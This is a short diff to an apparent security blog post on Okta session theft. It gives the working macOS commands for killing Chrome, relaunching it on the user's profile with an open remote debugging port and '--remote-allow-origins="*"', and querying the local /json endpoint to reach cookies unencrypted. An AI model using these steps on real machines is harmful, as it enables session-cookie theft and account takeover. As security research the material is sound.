JacksonKuo/blog/_posts/2024-11-17-okta-session-theft.markdown

 Google Chrome (macOS) cookies are stored in an encrypted SQLite database with the key saved in the keychain.
 Unencrypted cookies can still be fetched by attaching a remote chrome debugger.
 This technique requires existing Chrome browsers to be restarted with the `--remote-debugging-port` flag.

 * `killall Google\ Chrome`
-* `/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --user-data-dir="/Users/<user>/Library/Application Support/Google/Chrome" --restore-last-session`
+* `/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-allow-origins="*" --remote-debugging-port=9222 --user-data-dir="/Users/<user>/Library/Application Support/Google/Chrome" --restore-last-session --profile-directory=Default`

 The following `/json` endpoint provides a list of websocket addresses.
 * `curl http://localhost:9222/json`